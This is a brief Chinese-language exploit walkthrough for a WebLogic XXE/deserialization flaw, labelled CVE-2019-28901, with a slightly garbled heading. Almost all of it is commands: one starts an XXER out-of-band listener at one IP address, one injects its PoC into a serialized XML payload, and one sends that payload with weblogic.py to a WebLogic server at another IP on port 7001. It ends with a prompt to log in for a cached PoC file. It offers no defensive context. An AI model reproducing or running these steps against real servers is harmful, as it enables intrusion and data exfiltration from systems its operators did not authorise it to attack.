weblogic_cve-2019-28901)开启XXER工具
python xxer.py -H 192.168.17.223
2)将xxer的poc放到xx.xml文件中,替换序列化后的数据,注入xxer的poc;
java -jar weblogic_xxe.jar xx.xml
3)使用java-deserialization-exploit工具中的weblogic.py发送数据给weblogic服务器
python weblogic.py 192.168.17.222 7001 weblogic
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view